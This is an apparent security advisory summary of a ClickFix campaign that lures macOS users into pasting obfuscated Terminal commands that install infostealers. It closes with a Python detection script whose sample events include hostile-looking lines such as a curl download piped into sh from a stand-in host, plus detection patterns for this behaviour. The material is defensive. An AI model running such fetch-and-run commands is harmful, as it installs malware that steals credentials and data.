ClickFix macOS Campaign Delivers Infostealers
Summary
Microsoft has identified a new ClickFix-style campaign targeting macOS users with fake troubleshooting and utility instructions hosted on blogs and content platforms. Instead of downloading apps, victims are tricked into running Terminal commands that bypass typical macOS app checks and deploy infostealers such as Macsync, SHub Stealer, and AMOS.
Introduction
Microsoft is tracking an evolving ClickFix campaign that now targets macOS users through fake troubleshooting content and bogus utility installation instructions. This matters because the attack shifts away from traditional app downloads and instead abuses Terminal commands, helping attackers avoid some of the protections users expect from standard macOS application installs.
What’s new
Microsoft says threat actors are posting fake macOS advice on standalone websites, Medium, Craft, and similar user-driven platforms. The lures often claim to help with common issues such as freeing disk space or fixing system problems.
Key changes in this campaign include:
- Users are instructed to paste Base64-encoded or obfuscated commands into Terminal
- The commands retrieve remote content and launch script-based loaders
- Attackers use native tools like curl, osascript, and shell interpreters
- This method avoids the normal Gatekeeper-style checks applied to app bundles opened in Finder
- Payloads observed include Macsync, SHub Stealer, and AMOS
Microsoft also identified three execution paths:
- Loader install campaign
- Script install campaign
- Helper install campaign
Across these variants, the objective is consistent: collect credentials and sensitive files, establish persistence, and exfiltrate data.
Why it matters for IT admins
The malware goes beyond simple credential theft. According to Microsoft, these infostealers can collect:
- Keychain entries
- iCloud account data
- Browser credentials
- Telegram data
- Media and documents
- Cryptocurrency wallet data
Some variants also replace legitimate crypto wallet apps with trojanized versions, increasing the risk of financial theft.
For security teams, the bigger concern is user-driven execution. Because the victim manually runs commands in Terminal, attackers reduce dependence on malicious app packages and increase the chance of successful compromise.
Recommended actions
Administrators and security teams should take the following steps:
- Educate users not to paste commands into Terminal from blogs, forums, or troubleshooting pages
- Monitor for suspicious use of curl, osascript, shell interpreters, and unexpected LaunchAgent or LaunchDaemon creation
- Investigate staging paths such as /tmp/shub_<random ID> and unusual archive creation in /tmp
- Review detections for data exfiltration, credential prompts, and persistence tied to fake update services
- Prioritize protection for crypto-related apps and sensitive user data stores like Keychain
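As an added example (not code from Microsoft's report or from this article), the following Python triage script turns the monitoring points above into simple rules and runs them over constructed process and file events. The rule names, the event fields, and the sample telemetry are assumptions made for illustration, not Microsoft's detection logic.

```python
import re
from dataclasses import dataclass

# Heuristics taken from the campaign traits described above: Base64-decoded
# commands piped into a shell, curl output piped into a shell, osascript run
# from a Terminal session, LaunchAgent/LaunchDaemon plist creation, and
# staging under /tmp/shub_<random ID>. Regexes and names are assumptions.
CMDLINE_RULES = {
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"),
    "curl_to_shell": re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"),
    "osascript_from_terminal": re.compile(r"^(/usr/bin/)?osascript\b"),
}
PATH_RULES = {
    "launch_agent_or_daemon_created": re.compile(r"/Library/Launch(Agents|Daemons)/[^/]+\.plist$"),
    "shub_staging_dir": re.compile(r"^/tmp/shub_[A-Za-z0-9]+"),
    "archive_created_in_tmp": re.compile(r"^/tmp/.*\.(zip|tar|tgz|tar\.gz)$"),
}
TERMINAL_APPS = {"Terminal", "iTerm2"}  # assumed names of interactive terminal parents

@dataclass
class Event:
    kind: str              # "exec" or "file_create" (assumed telemetry schema)
    value: str             # command line for exec, path for file_create
    ancestors: tuple = ()  # process ancestry, nearest parent first

def classify(event):
    """Return the names of every rule the event matches."""
    hits = []
    if event.kind == "exec":
        for name, rx in CMDLINE_RULES.items():
            if not rx.search(event.value):
                continue
            # osascript is normal from launchd or apps; only flag Terminal lineage
            if name == "osascript_from_terminal" and not (TERMINAL_APPS & set(event.ancestors)):
                continue
            hits.append(name)
    elif event.kind == "file_create":
        hits.extend(name for name, rx in PATH_RULES.items() if rx.search(event.value))
    return hits

def triage(events):
    """Keep only events that matched at least one rule, with their rule names."""
    return [(e.value, h) for e in events if (h := classify(e))]

# Constructed sample telemetry, not real captures ("ZWNobyBoaQ==" decodes to "echo hi").
SAMPLE = [
    Event("exec", "echo 'ZWNobyBoaQ==' | base64 -d | bash", ("zsh", "Terminal")),
    Event("exec", "curl -fsSL https://example.invalid/loader.sh | sh", ("bash", "Terminal")),
    Event("exec", "/usr/bin/osascript -e 'display dialog \"System update\"'", ("bash", "Terminal")),
    Event("exec", "/usr/bin/osascript /Library/Scripts/backup.scpt", ("launchd",)),
    Event("file_create", "/tmp/shub_x9Qk2/keychain.db"),
    Event("file_create", "/tmp/out.zip"),
    Event("file_create", "/Users/alice/Library/LaunchAgents/com.update.helper.plist"),
    Event("file_create", "/Users/alice/Documents/notes.txt"),
]

if __name__ == "__main__":
    for value, hits in triage(SAMPLE):
        print(f"{', '.join(hits)}: {value}")
```

The benign osascript run from launchd and the ordinary document write are left unflagged, which is the kind of lineage and path context that keeps such rules from drowning analysts in noise.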
Bottom line
This ClickFix macOS campaign shows how social engineering is adapting to bypass traditional app-based defenses. For defenders, user awareness, endpoint monitoring, and detection of suspicious script execution are now critical to stopping these infostealer chains before data is stolen.